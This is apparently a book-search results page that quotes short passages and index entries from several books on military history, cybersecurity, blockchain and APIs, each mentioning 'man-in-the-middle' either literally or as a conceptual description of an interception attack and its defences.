Without Borders Reputation.com Research in Motion (RIM), 2.1, 2.2 Resource 207 Responsibility to Protect (RtoP) doctrine restraining orders Revolutionary Armed Forces of Colombia (FARC) revolutions, itr.1, 4.1 connectivity and, 4.1, 4.2, 4.3, 4.4, 4.5, 4.6 finish of public awareness of start of robotic surgical suites, n robots, 1.1, 1.2, 6.1, 6.2, 6.3, 6.4, 6.5 Rodong Sinmun, 97 Roma, 6.1, nts.1 Romania Roomba, 1.1, 6.1 Rosenberg, Tina Roshan Ross, Alec routers RQ-170 Sentinel Rubin, Andy Russia, 3.1, 3.2, 3.3, 3.4, 3.5, 3.6 liberal opposition in revolution in state-owned media in Rwanda genocide in, 6.1, 7.1 safe zones sakoku, 93 Salafis, n Saleh, Ali Abdullah Salem, Mahmoud Samasource Sanger, David E.


pages: 812 words: 180,057

The Generals: American Military Command From World War II to Today by Thomas E. Ricks

affirmative action, airport security, amateurs talk tactics, professionals talk logistics, Charles Lindbergh, Columbine, continuation of politics by other means, cuban missile crisis, hiring and firing, MITM: man-in-the-middle, no-fly zone, RAND corporation, Ronald Reagan, Seymour Hersh, South China Sea, Yom Kippur War

RICKS TITLE PAGE COPYRIGHT DEDICATION EPIGRAPH PROLOGUE: Captain William DePuy and the 90th Division in Normandy, summer 1944 PART I WORLD WAR II 1. General George C. Marshall: The leader 2. Dwight Eisenhower: How the Marshall system worked 3. George Patton: The specialist 4. Mark Clark: The man in the middle 5. “Terrible Terry” Allen: Conflict between Marshall and his protégés 6. Eisenhower manages Montgomery 7. Douglas MacArthur: The general as presidential aspirant 8. William Simpson: The Marshall system and the new model American general PART II THE KOREAN WAR 9. William Dean and Douglas MacArthur: Two generals self-destruct 10.

Narrow as that mission is, it was precisely the job the American military faced in Europe in late 1944 and early 1945, and that is likely the primary reason Patton was never sent home in disgrace. On balance, Eisenhower was right to keep him. And the modern American military probably is worse for not having a few senior commanders with a dose of Patton’s dynamism and color in them. CHAPTER 4 Mark Clark The man in the middle Like Patton, Lt. Gen. Mark Clark was close to Eisenhower, but he was far less effective on the battlefield. Clark was also a difficult man to like. “It makes my flesh creep to be with him,” Patton once wrote in his diary. Ten months later Patton noted that “anyone who serves under Clark is always in danger.”

Patton also told Eisenhower: Blumenson, Patton Papers, 55, 168. “He is the most modern general”: Blumenson, Patton Papers, 654. See also B. H. Liddell Hart, The German Generals Talk (Berkley, 1958), 215. “a master of fast” . . . “United States Army has known”: Eisenhower, At Ease, 172–73. 4. MARK CLARK: THE MAN IN THE MIDDLE “It makes my flesh creep” . . . “Clark is always in danger”: Blumenson, Patton Papers, 157, 361. the assault was a “near disaster”: General Mark W. Clark, Calculated Risk (Enigma, 2007), 152. “Mark, leave enough ammunition”: Frank James Price, Troy H. Middleton: A Biography (Louisiana State University Press, 1974), 169.


pages: 651 words: 186,130

This Is How They Tell Me the World Ends: The Cyberweapons Arms Race by Nicole Perlroth

4chan, active measures, activist lawyer, air gap, Airbnb, Albert Einstein, Apollo 11, barriers to entry, Benchmark Capital, Bernie Sanders, Big Tech, bitcoin, Black Lives Matter, blood diamond, Boeing 737 MAX, Brexit referendum, Brian Krebs, Citizen Lab, cloud computing, commoditize, company town, coronavirus, COVID-19, crony capitalism, crowdsourcing, cryptocurrency, dark matter, David Vincenzetti, defense in depth, digital rights, disinformation, don't be evil, Donald Trump, driverless car, drone strike, dual-use technology, Edward Snowden, end-to-end encryption, failed state, fake news, false flag, Ferguson, Missouri, Firefox, gender pay gap, George Floyd, global pandemic, global supply chain, Hacker News, index card, information security, Internet of things, invisible hand, Jacob Appelbaum, Jeff Bezos, John Markoff, Ken Thompson, Kevin Roose, Laura Poitras, lockdown, Marc Andreessen, Mark Zuckerberg, mass immigration, Menlo Park, MITM: man-in-the-middle, moral hazard, Morris worm, move fast and break things, mutually assured destruction, natural language processing, NSO Group, off-the-grid, offshore financial centre, open borders, operational security, Parler "social media", pirate software, purchasing power parity, race to the bottom, RAND corporation, ransomware, Reflections on Trusting Trust, rolodex, Rubik’s Cube, Russian election interference, Sand Hill Road, Seymour Hersh, Sheryl Sandberg, side project, Silicon Valley, Skype, smart cities, smart grid, South China Sea, Steve Ballmer, Steve Bannon, Steve Jobs, Steven Levy, Stuxnet, supply-chain attack, TED Talk, the long tail, the scientific method, TikTok, Tim Cook: Apple, undersea cable, unit 8200, uranium enrichment, web application, WikiLeaks, zero day, Zimmermann PGP

The agency appeared to have acquired a vast library of invisible backdoors into almost every major app, social media platform, server, router, firewall, antivirus software, iPhone, Android phone, BlackBerry phone, laptop, desktop, and operating system. In the hacking world, these invisible backdoors have sci-fi names: they call them zero-days (or 0 days), pronounced “oh-days.” Zero-day is one of those cyber terms like infosec and man-in-the-middle attack that security professionals throw around to make it all too easy for the rest of us to tune them out. For the unindoctrinated: zero-days offer digital superpowers. They are a cloak of invisibility, and for spies and cybercriminals, the more invisible you can make yourself, the more power you will have.

In a single day, top-secret NSA slides showed that—unbeknownst to Yahoo, Microsoft, Facebook, and Google—the agency had collected “444,743 Yahoo email address books, 105,068 from Hotmail, 82,857 from Facebook, 33,697 from Gmail, and 22,881 from unspecified providers.” That wasn’t the worst of it. The slides appeared to show that the NSA and GCHQ were directly hacking Google and Yahoo’s internal data centers to intercept customer data before it was encrypted and passed over the open web—essentially a man-in-the-middle attack. The NSA-GCHQ code name for these attacks was Muscular. On one level, it was helpful in explaining that the companies were not willing accomplices. “It provided us a key to finally understand what was going on,” Brad Smith, Microsoft’s president, told Wired magazine. “We had been reading about the NSA reportedly having a massive amount of data.

In most cases, the Russians were hacking people—the industrial control engineers who maintain direct access to pipelines, transmission lines, and power switches. In others the Russians infected legitimate websites frequented by utility, pipeline, and grid operators with malware in what security specialists call a “watering-hole attack,” because hackers poison the well and wait for prey to come. And in still others, Russian hackers were conducting man-in-the-middle attacks, redirecting victims’ web traffic through Russian hackers’ machines, taking American grid operators’ usernames, passwords, blueprints, and emails on the way through. This was hardly the first time a foreign actor had targeted the energy sector. China had hacked into one American energy firm after another with cyberattacks that American officials concluded were designed to steal U.S. fracking and renewable energy technology.


pages: 434 words: 77,974

Mastering Blockchain: Unlocking the Power of Cryptocurrencies and Smart Contracts by Lorne Lantz, Daniel Cawrey

air gap, altcoin, Amazon Web Services, barriers to entry, bitcoin, blockchain, business logic, business process, call centre, capital controls, cloud computing, corporate governance, creative destruction, cross-border payments, cryptocurrency, currency peg, disinformation, disintermediation, distributed ledger, Dogecoin, Ethereum, ethereum blockchain, fault tolerance, fiat currency, Firefox, global reserve currency, information security, initial coin offering, Internet of things, Kubernetes, litecoin, low interest rates, Lyft, machine readable, margin call, MITM: man-in-the-middle, multilevel marketing, Network effects, offshore financial centre, OSI model, packet switching, peer-to-peer, Ponzi scheme, prediction markets, QR code, ransomware, regulatory arbitrage, rent-seeking, reserve currency, Robinhood: mobile stock trading app, Ross Ulbricht, Satoshi Nakamoto, Silicon Valley, Skype, smart contracts, software as a service, Steve Wozniak, tulip mania, uber lyft, unbanked and underbanked, underbanked, Vitalik Buterin, web application, WebSocket, WikiLeaks

When the user wants to log in, the following sequence takes place: The user sends the password as plain text to the server. The server encrypts the password using a standard encryption algorithm, such as MD5. If the newly generated MD5 hash matches the hash stored in the database, then the password entered is valid. However, this method makes the user’s password vulnerable to the following: Man in the middle attacks If a hacker compromises the communication between the user and the server, it is possible to intercept the plain-text password. Brute force and dictionary attacks If a website’s database is breached, a hacker can potentially decrypt the user’s password through various methods, including brute force using trial and error or dictionary attacks using a list of words or phrases.

evolution of, Electronic Systems and Trust Internet of Things (IoT), permissioned ledger implementations of blockchain, Internet of Things interoperability between different blockchains, Interoperability Interplanetary File System (IPFS), Web 3.0 issuance trust, Electronic Systems and Trust IT systems, permissioned ledger uses, IT Ixcoin, Altcoins J Java, Corda language JPMorgan, JPMorganinterbank payments using permissioned ledger, Payments jurisdiction over cryptocurrency exchanges, Jurisdiction K Keccak-256 hash algorithm, Hashes Know Your Customer (KYC) rules, Banking Risk, DAIon centralized and decentralized exchanges, Know your customer crypto laundering and, The Evolution of Crypto Laundering implementation in Novi wallet, Novi in Singapore, Singapore stablecoins requiring/not requiring, KYC and pseudonymity L LBFT consensus protocol, How the Libra Protocol Works Ledger wallet, Wallets ledgers, Storing Data in a Chain of Blocks, Databases and LedgersCorda, Corda ledger distributed verifiable, key properties of, Key Properties of Distributed Verifiable Ledgers Hyperledger Fabric technology, Hyperledger permissioned ledger uses of blockchain, Permissioned Ledger Uses-Payments Ripple, Ripple legal industry, permissioned ledger uses, Legal legal requirements, cryptocurrency and blockchain technology skirting the laws, Skirting the Laws lending services (DeFi), Lending less than 5% rule, Counterparty Risk Libra, Libra-Summaryborrowing from existing blockchains, Borrowing from Existing Blockchains centralization challenges, Novi how the Libra protocol works, How the Libra Protocol Works-Transactionsblocks, Blocks transactions, Transactions Libra Association, The Libra Association Novi wallet and other third-party wallets, Novi Lightning, Lightning, Lightningfunding transactions, Funding transactions nodes and wallets, Lightning nodes and wallets off-chain transactions, Off-chain transactions solving scalability issues on Blockchain, Lightning Liquid multisignature wallet, Liquid liquidity, Arbitrageor depth in a market, Hunting for Bart Litecoin, Litecoin longest chain rule, The mining process lottery-based consensus, Alternative methods M MaidSafe, Understanding Omni LayerICO for, Use Cases: ICOs Maker project's DAI, DAIsavings rates for DAI, Savings Malta, regulatory arbitrage, Malta man in the middle attacks, Zero-Knowledge Proof margin/leveraged products, Derivatives market capitalization, low, cryptocurrencies with, Whales market depthconsiderations in cryptocurrency trading, Basic Mistakes lacking in cryptocurrency market, Cryptocurrency Market Structure market infrastructure, Market Infrastructure-Summaryanalysis, Analysis-Hunting for Bartfundamental cryptocurrency analysis, Fundamental Cryptocurrency Analysis-Tools for fundamental analysis technical cryptocurrency analysis, Technical Cryptocurrency Analysis-Hunting for Bart arbitrage trading, Arbitrage Trading-Float Configuration 3 cryptocurrency market structure, Cryptocurrency Market Structure-Transaction flowsaribtrage, Arbitrage counterparty risk, Counterparty Risk market data, Market Data-Transaction flows depth charts, Depth Charts derivatives, Derivatives exchange APIs and trading bots, Exchange APIs and Trading Bots-Market Aggregatorsmarket aggregators, Market Aggregators open source trading tech, Open Source Trading Tech rate limiting, Rate Limiting REST versus WebSocket APIs, REST Versus WebSocket testing trading bot in sandbox, Testing in a Sandbox exchanges, The Role of Exchanges-The Role of Exchanges order books, Order Books regulatory challenges, Regulatory Challenges-Basic Mistakes slippage in cryptocurrency trading, Slippage wash trading, Wash Trading ways to buy and sell cryptocurrency, Evolution of the Price of Bitcoin whales, Whales market size, Order Books Mastercoin, Mastercoin and Smart Contracts, Tokenize EverythingEthereum and, Ethereum: Taking Mastercoin to the Next Level raising cryptocurrency funds to launch a project, Use Cases: ICOs Meetup.com, Information mempool, unconfirmed transactions on Bitcoin, Transaction life cycle Merkelized Abstract Syntax Trees (MAST), Privacy Merkle roots, Storing Data in a Chain of Blocks, The Merkle Root-The Merkle Rootin block hashes, Block Hashes Merkle trees, The Merkle Root MetaMask wallet, ConsenSys, Walletsusing in writing smart contracts, Writing a smart contract Middleton, Reggie, Skirting the Laws Mimblewimble, Mimblewimble, Beam, and Grin mining, Mining-Block Generation, Evolution of the Price of BitcoinBitcoin, problems with, Ripple and Stellar block generation, Block Generation GAW Miners, Skirting the Laws impacts on market data, Slippage incentives for, Mining Is About Incentives miners discovering new block at same time, The mining process process on Bitcoin for block discovery, The mining process Scrypt, Altcoins transactions confirmed by miner on Bitcoin, Transaction life cycle mint-based currency model, The Whitepaper minting, Important Definitions MKR token, DAI mobile wallets, Wallet Type Variations Moesif’s binary encoder/decoder, Custody and counterparty risk Monero, Monero, Ring Signatures, The Evolution of Crypto Laundering, Blockchains to Watchhow it works, How Monero Works-How Monero Works money laundering, Banking Risk(see also Anti-Money Laundering (AML) rules) evolution of crypto laundering, The Evolution of Crypto Laundering-The Evolution of Crypto Laundering Money Services Business (MSB) standards, The FATF and the Travel Rule MoneyGram, Ripple Mt.


pages: 328 words: 77,877

API Marketplace Engineering: Design, Build, and Run a Platform for External Developers by Rennay Dorasamy

Airbnb, Amazon Web Services, barriers to entry, business logic, business process, butterfly effect, continuous integration, DevOps, digital divide, disintermediation, fault tolerance, if you build it, they will come, information security, Infrastructure as a Service, Internet of things, Jeff Bezos, Kanban, Kubernetes, Lyft, market fragmentation, microservices, minimum viable product, MITM: man-in-the-middle, mobile money, optical character recognition, platform as a service, pull request, ride hailing / ride sharing, speech recognition, the payments system, transaction costs, two-pizza team, Uber and Lyft, uber lyft, underbanked, web application

The purpose of this step is to establish the client identity and allows the resource server to track access requests. 2. The Client provides details regarding where the request will originate from and where the end user should be redirected to. This is important as it limits potential man-in-the-middle attacks. As you will note, the redirect URI is used for a number of interactions. 3. At the end of this process, the Resource Server will provide credentials to the Client in the form of a Client ID and Client Secret. In some API Gateway products, once an application is created, access to API products is achieved through a process of a subscription.

That is, if the request is not processed successfully within milliseconds, it could result in potential revenue loss for the merchant consuming the interface. The approaches to achieve this requirement are contrasted in Figure 7-6. On the left is our current approach which we have dubbed the “man-in-the-middle” pattern and on the right is the new “tap-and-go” strategy. Proponents for the tap-and-go highlight that as the Marketplace is not an integral participant in the transaction, an observer role should be adopted. As an observer, only information necessary for monitoring and insight should be extracted.


pages: 91 words: 18,831

Getting Started With OAuth 2.0 by Ryan Boyd

MITM: man-in-the-middle, Salesforce, social graph, web application

There are two main types of replay attacks we wish to prevent: An attacker capturing a user’s OAuth credentials as they log in to a site and using them later on the same site. A rogue application developer using the OAuth token a user was issued to log in to their malicious app in order to impersonate the user on a different legitimate app. The OAuth 2.0 specification requires the OAuth endpoint and APIs to be accessed over SSL/TLS to prevent man-in-the-middle attacks, such as the first case. Preventing rogue application developers from replaying legitimate OAuth credentials their app received in order to impersonate one of their users on another app requires a solution specific to OpenID Connect. This solution is the Check ID Endpoint. The Check ID Endpoint is used to verify that the credentials issued by the OAuth provider were issued to the correct application.


pages: 470 words: 144,455

Secrets and Lies: Digital Security in a Networked World by Bruce Schneier

Ayatollah Khomeini, barriers to entry, Bletchley Park, business process, butterfly effect, cashless society, Columbine, defense in depth, double entry bookkeeping, drop ship, fault tolerance, game design, IFF: identification friend or foe, information security, John Gilmore, John von Neumann, knapsack problem, macro virus, Mary Meeker, MITM: man-in-the-middle, moral panic, Morris worm, Multics, multilevel marketing, mutually assured destruction, PalmPilot, pez dispenser, pirate software, profit motive, Richard Feynman, risk tolerance, Russell Brand, Silicon Valley, Simon Singh, slashdot, statistical model, Steve Ballmer, Steven Levy, systems thinking, the payments system, Timothy McVeigh, Y2K, Yogi Berra

The result is a file that can only be accessed by Alice, or someone else who knows the password. Want to build a secure telephone? Use public-key cryptography to generate a random session key, and then use symmetric cryptography and that session key to encrypt the conversation. A hash function provides added security against man-in-the-middle attacks. (More about those later.) To secure e-mail, use public-key cryptography for privacy and digital signature schemes for authentication. Electronic commerce? Usually nothing more than digital signatures and sometimes encryption for privacy. A secure audit log: combine a hash function, encryption, maybe a MAC, and stir.

Maybe you can manipulate the protocol between the bank and the card that adds money onto the card. If you can replay old messages, you can add more money onto the card. Or maybe you can delete a message in the protocol for transferring money out of the card when you buy something, so that the money never gets decremented from the card. One powerful attack is the man-in-the-middle attack. Alice wants to talk securely with Bob, using some public-key algorithm to establish a key. Eve, the eavesdropper, intercepts Alice’s communication. She pretends to be someone named Bob to Alice, completing the key- exchange protocol. Then she contacts Bob and pretends to be Alice, completing a second key-exchange protocol with Bob.

When Alice sends a message to Bob, Eve intercepts it, decrypts it, re-encrypts it, and sends it on to Bob. When Bob sends a message to Alice, Eve performs a similar procedure. This is a powerful attack. Of course, good protocol designers take these attacks into account and try to prevent them. Better communications protocols don’t permit man-in-the-middle attacks, and certainly don’t allow eavesdropping of passwords. Better electronic commerce protocols don’t allow malicious users to arbitrarily add cash to smart cards. But people make mistakes, and lots of protocols have problems. And again, it’s not always apparent what kinds of attacks need to be prevented.


Mastering Blockchain, Second Edition by Imran Bashir

3D printing, altcoin, augmented reality, autonomous vehicles, bitcoin, blockchain, business logic, business process, carbon footprint, centralized clearinghouse, cloud computing, connected car, cryptocurrency, data acquisition, Debian, disintermediation, disruptive innovation, distributed ledger, Dogecoin, domain-specific language, en.wikipedia.org, Ethereum, ethereum blockchain, fault tolerance, fiat currency, Firefox, full stack developer, general-purpose programming language, gravity well, information security, initial coin offering, interest rate swap, Internet of things, litecoin, loose coupling, machine readable, MITM: man-in-the-middle, MVC pattern, Network effects, new economy, node package manager, Oculus Rift, peer-to-peer, platform as a service, prediction markets, QR code, RAND corporation, Real Time Gross Settlement, reversible computing, RFC: Request For Comment, RFID, ride hailing / ride sharing, Satoshi Nakamoto, seminal paper, single page application, smart cities, smart contracts, smart grid, smart meter, supply-chain management, transaction costs, Turing complete, Turing machine, Vitalik Buterin, web application, x509 certificate

This protocol uses X.509 certificates for authentication and runs over HTTP and HTTPS. There are three messages in this protocol: PaymentRequest, Payment, and PaymentACK. The key features of this proposal are defense against man-in-the-middle attacks and secure proof of payment. Man-in-the-middle attacks can result in a scenario where the attacker is sitting between the merchant and the buyer and it would seem to the buyer that they are talking to the merchant, but in fact, the man in the middle is interacting with the buyer instead of the merchant. This can result in manipulation of the merchant's Bitcoin address to defraud the buyer. Several other BIPs, such as BIP 71 (Payment Protocol MIME types) and BIP 72 (URI extensions for Payment Protocol), have also been implemented to standardize payment scheme to support BIP 70 (Payment Protocol).


pages: 562 words: 153,825

Dark Mirror: Edward Snowden and the Surveillance State by Barton Gellman

4chan, A Declaration of the Independence of Cyberspace, Aaron Swartz, active measures, air gap, Anton Chekhov, Big Tech, bitcoin, Cass Sunstein, Citizen Lab, cloud computing, corporate governance, crowdsourcing, data acquisition, data science, Debian, desegregation, Donald Trump, Edward Snowden, end-to-end encryption, evil maid attack, financial independence, Firefox, GnuPG, Google Hangouts, housing justice, informal economy, information security, Jacob Appelbaum, job automation, John Perry Barlow, Julian Assange, Ken Thompson, Laura Poitras, MITM: man-in-the-middle, national security letter, off-the-grid, operational security, planetary scale, private military company, ransomware, Reflections on Trusting Trust, Robert Gordon, Robert Hanssen: Double agent, rolodex, Ronald Reagan, Saturday Night Live, seminal paper, Seymour Hersh, Silicon Valley, Skype, social graph, standardized shipping container, Steven Levy, TED Talk, telepresence, the long tail, undersea cable, Wayback Machine, web of trust, WikiLeaks, zero day, Zimmermann PGP

By agreement, with few exceptions, the NSA also restrains itself from clandestine surveillance in Canada, the United Kingdom, Australia, and New Zealand—the other four members of the Five Eyes intelligence partnership. Undisclosed operations inside other allied countries are regarded as risky but not out of bounds. man in the middle: In a man-in-the-middle attack, the NSA places or takes control of equipment directly in the path of digital traffic from one server to another. This enables the agency to read—and alter, for example by injecting malware—the data flow between source and destination. man on the side: A man-on-the-side attack gives the NSA access to but not control of equipment, such as a router or switch, that stands between the source and destination of digital traffic.

Overseas, where domestic legal restrictions do not apply, the acquisitions directorate, S3, is free to tunnel just about anywhere it likes. A worldwide hacking infrastructure called QUANTUM deploys a broad range of tools to inject software exploits, intercept communications with methods known as man in the middle and man on the side, and reroute calls and emails through NSA collection points. Most of these are known as passive operations because they collect electronic signals automatically as they pass through large trunk lines and junctions. When passive methods do not suffice, the job becomes, in NSA parlance, interactive.


pages: 134 words: 29,488

Python Requests Essentials by Rakesh Vidya Chandra, Bala Subrahmanyam Varanasi

business logic, create, read, update, delete, en.wikipedia.org, Kickstarter, machine readable, MITM: man-in-the-middle, MVC pattern, natural language processing, RFC: Request For Comment, RFID, supply-chain management, web application

The cracking of the password hashes becomes difficult in digest authentication with the use of a nonce, which counters the chosen plain text attacks. Even though Digest authentication overcomes most of the drawbacks of Basic authentication, it does have some disadvantages. This scheme of authentication is vulnerable to man-in-the-middle attacks. It reduces the flexibility of storing the password in the password's database, as all the well designed password databases use other encryption methods to store them. [ 31 ] Authenticating with Requests Using Digest authentication with Requests Using Digest authentication with requests is very simple.


pages: 390 words: 96,624

Consent of the Networked: The Worldwide Struggle for Internet Freedom by Rebecca MacKinnon

A Declaration of the Independence of Cyberspace, Bay Area Rapid Transit, Berlin Wall, blood diamond, business cycle, business intelligence, Cass Sunstein, Chelsea Manning, citizen journalism, Citizen Lab, cloud computing, cognitive dissonance, collective bargaining, conceptual framework, corporate social responsibility, Deng Xiaoping, digital divide, digital Maoism, don't be evil, Eben Moglen, Evgeny Morozov, Filter Bubble, Firefox, future of journalism, Global Witness, high-speed rail, illegal immigration, Jaron Lanier, Jeff Bezos, John Markoff, John Perry Barlow, Joi Ito, Julian Assange, Mark Zuckerberg, Mikhail Gorbachev, MITM: man-in-the-middle, national security letter, online collectivism, Panopticon Jeremy Bentham, Parag Khanna, pre–internet, race to the bottom, real-name policy, Richard Stallman, Ronald Reagan, sharing economy, Silicon Valley, Silicon Valley startup, Skype, Steve Crocker, Steven Levy, Tactical Technology Collective, technological determinism, WikiLeaks, Yochai Benkler

Bizarrely, in late February as political tensions mounted, the government suddenly unblocked social media websites such as Facebook, Blogspot, and YouTube for the first time since 2007. The reasons soon became clear: soon after the ban was lifted, government hackers launched what is known technically as a “man in the middle” attack on Syrian Facebook users, inserting a false “security certificate” onto people’s browsers when they tried to log into their Facebook accounts through the secure “https” version of the site. This attack enabled government hackers to take over activists’ accounts and gain access to their entire network of contacts.

Meanwhile, Ali Abdulemam—still in hiding—was sentenced in absentia to fifteen years in prison: Leila Nachawati, “Bahrain: Leading Blogger Ali Abdulemam Sentenced to 15 Years in Prison, Along with Other Human Rights Defenders,” Global Voices Advocacy, June 22, 2011, http://advocacy.globalvoicesonline.org/2011/06/22/bahrain-leading-blogger-ali-abdulemam-sentenced-to-15-years-in-prison-along-with-other-human-rights-defenders (all accessed June 27, 2011). 63 statement by King Hamad bin Isa Al Khalifa: “His Majesty Stresses the Key to Reform Is Through Press Freedom,” Bahrain News Agency, May 3, 2011, www.bna.bh/portal/en/news/455101 (accessed August 11, 2011). 64 In Syria, where between March and July 2011 an estimated 1,400 people were killed and at least 15,000 detained: See Neil MacFarquhar and Rick Gladstone, “Outside Pressure Builds on Syria,” New York Times, August 2, 2011, www.nytimes.com/2011/08/03/world/middleeast/03syria.html; and “Syria: Mass Arrest Campaign Intensifies,” Human Rights Watch, July 20, 2011, www.hrw.org/news/2011/07/20/syria-mass-arrest-campaign-intensifies (all accessed August 2, 2011). 64 “man in the middle” attack on Syrian Facebook users: See Anas Qtiesh, “Did Syria Replace Facebook’s Security Certificate with a Forged One?” Global Voices Advocacy, May 4, 2011, http://advocacy.globalvoicesonline.org/2011/05/05/did-syria-replace-facebooks-security-certificate-with-a-forged-one; and Leila Nachawati, “Syrian Uprisings and Official vs.


pages: 834 words: 180,700

The Architecture of Open Source Applications by Amy Brown, Greg Wilson

8-hour work day, anti-pattern, bioinformatics, business logic, c2.com, cloud computing, cognitive load, collaborative editing, combinatorial explosion, computer vision, continuous integration, Conway's law, create, read, update, delete, David Heinemeier Hansson, Debian, domain-specific language, Donald Knuth, en.wikipedia.org, fault tolerance, finite state, Firefox, Free Software Foundation, friendly fire, functional programming, Guido van Rossum, Ken Thompson, linked data, load shedding, locality of reference, loose coupling, Mars Rover, MITM: man-in-the-middle, MVC pattern, One Laptop per Child (OLPC), peer-to-peer, Perl 6, premature optimization, recommendation engine, revision control, Ruby on Rails, side project, Skype, slashdot, social web, speech recognition, the scientific method, The Wisdom of Crowds, web application, WebSocket

Some of the possible threats include: the central index may be compromised the mirrors might be tampered with a man-in-the-middle attack between the central index and the end user, or between a mirror and the end user To detect the first attack, package authors need to sign their packages using PGP keys, so that users can verify that the package comes from the author they trust. The mirroring protocol itself only addresses the second threat, though some attempt is made to detect man-in-the-middle attacks. The central index provides a DSA key at the URL /serverkey, in the PEM format as generated by openssl dsa -pubout3.

Verification is not needed when downloading from central index, and clients should not do it to reduce the computation overhead. About once a year, the key will be replaced with a new one. Mirrors will have to re-fetch all /serversig pages. Clients using mirrors need to find a trusted copy of the new server key. One way to obtain one is to download it from https://pypi.python.org/serverkey. To detect man-in-the-middle attacks, clients need to verify the SSL server certificate, which will be signed by the CACert authority. 14.5. Implementation Details The implementation of most of the improvements described in the previous section are taking place in Distutils2. The setup.py file is not used anymore, and a project is completely described in setup.cfg, a static .ini-like file.


pages: 404 words: 113,514

Atrocity Archives by Stross, Charles

airport security, anthropic principle, Berlin Wall, Bletchley Park, brain emulation, British Empire, Buckminster Fuller, defense in depth, disinformation, disintermediation, experimental subject, glass ceiling, haute cuisine, hypertext link, Khyber Pass, luminiferous ether, mandelbrot fractal, Menlo Park, MITM: man-in-the-middle, Neal Stephenson, NP-complete, PalmPilot, pneumatic tube, Snow Crash, Strategic Defense Initiative, the medium is the message, Y2K, yield curve

"Er, I was attending a training course: Introduction to Applied Occult Computing 104, conducted by Dr. Vohlman." The balding man in the middle makes a doodle on his pad then fixes me with a cold stare. "Your opinion of the course?" "My--er?" I freeze for a moment; this isn't in the script. "I was bored silly--um, the course was fine, but it was a bit basic. I was only there because Harriet was pissed off at me for coming in late after putting in a twenty-hour shift. Dr. Vohlman did a good job, but really it was insanely basic and I didn't learn anything new and wasn't paying much attention--" Why am I saying this? The man in the middle looks at me again. It's like being under a microscope; I feel the back of my neck burst out in a cold, prickly sweat.


pages: 349 words: 114,038

Culture & Empire: Digital Revolution by Pieter Hintjens

4chan, Aaron Swartz, airport security, AltaVista, anti-communist, anti-pattern, barriers to entry, Bill Duvall, bitcoin, blockchain, Boeing 747, bread and circuses, business climate, business intelligence, business process, Chelsea Manning, clean water, commoditize, congestion charging, Corn Laws, correlation does not imply causation, cryptocurrency, Debian, decentralized internet, disinformation, Edward Snowden, failed state, financial independence, Firefox, full text search, gamification, German hyperinflation, global village, GnuPG, Google Chrome, greed is good, Hernando de Soto, hiring and firing, independent contractor, informal economy, intangible asset, invisible hand, it's over 9,000, James Watt: steam engine, Jeff Rulifson, Julian Assange, Kickstarter, Laura Poitras, M-Pesa, mass immigration, mass incarceration, mega-rich, military-industrial complex, MITM: man-in-the-middle, mutually assured destruction, Naomi Klein, national security letter, Nelson Mandela, new economy, New Urbanism, no silver bullet, Occupy movement, off-the-grid, offshore financial centre, packet switching, patent troll, peak oil, power law, pre–internet, private military company, race to the bottom, real-name policy, rent-seeking, reserve currency, RFC: Request For Comment, Richard Feynman, Richard Stallman, Ross Ulbricht, Russell Brand, Satoshi Nakamoto, security theater, selection bias, Skype, slashdot, software patent, spectrum auction, Steve Crocker, Steve Jobs, Steven Pinker, Stuxnet, The Wealth of Nations by Adam Smith, The Wisdom of Crowds, trade route, transaction costs, twin studies, union organizing, wealth creators, web application, WikiLeaks, Y2K, zero day, Zipf's Law

This gives us secrecy, thanks to the encryption, and also "authentication," which is the knowledge that the data really came from me, and not an impostor. There is little point in encryption if we can't be sure of the sender. There's a small catch: you also need to be sure that B is really my key, and was not switched by some "man in the middle," or MIM. For asymmetric keys to work at all well, those encryption keys must be exchanged securely, which creates an interesting Catch-22 that attackers exploit. The keys must also, and this is very important, be really random and unguessable. If you can guess the keys, the whole encryption exercise is for naught.

In 2013, any security product that isn't open source isn't credible. We're still not secure, however. Let's say we can generate really strong keys that no-one could ever guess, immune from rubber-hose attacks, and hard enough to crack that it would take a zillion years to try all combinations. It's still trivial to break such security, if I can do a man in the middle attack. A MIM attack takes advantage of the fact that even if we can create secure keys, we need some way to exchange them. It's like me sending the key to my house in the mail to a person coming to stay. An attacker can open the mail, take out my key, substitute his, with a letter containing an impostor address.


pages: 443 words: 116,832

The Hacker and the State: Cyber Attacks and the New Normal of Geopolitics by Ben Buchanan

active measures, air gap, Bernie Sanders, bitcoin, blockchain, borderless world, Brian Krebs, British Empire, Cass Sunstein, citizen journalism, Citizen Lab, credit crunch, cryptocurrency, cuban missile crisis, data acquisition, disinformation, Donald Trump, drone strike, Edward Snowden, fake news, family office, Hacker News, hive mind, information security, Internet Archive, Jacob Appelbaum, John Markoff, John von Neumann, Julian Assange, Kevin Roose, Kickstarter, kremlinology, Laura Poitras, MITM: man-in-the-middle, Nate Silver, operational security, post-truth, profit motive, RAND corporation, ransomware, risk tolerance, Robert Hanssen: Double agent, rolodex, Ronald Reagan, Russian election interference, seminal paper, Silicon Valley, South China Sea, Steve Jobs, Stuxnet, subscription business, technoutopianism, undersea cable, uranium enrichment, Vladimir Vetrov: Farewell Dossier, Wargames Reagan, WikiLeaks, zero day

Even as the PLA generated new hop points, TAO had such good access and insight into the PLA’s efforts that it could identify the new computers fairly easily. But why stop there? Instead of observing from hop points and watching from the PLA’s internet provider, TAO could go further. The NSA’s hackers could, at long last, target the actual computers owned by the hackers in this part of the PLA. TAO employed something called a man-in-the-middle operation. This requires access to the target’s internet traffic, access that TAO’s hacking efforts had gained with their penetration of China’s hacking infrastructure. From this privileged vantage point, the NSA’s hackers could intercept and sometimes manipulate the PLA’s data as it moved from its source to its destination and back again.9 Using this access, TAO appears to have added some secret malicious code to the PLA’s normal internet traffic, hacking the computers from which the Chinese carried out their operations.

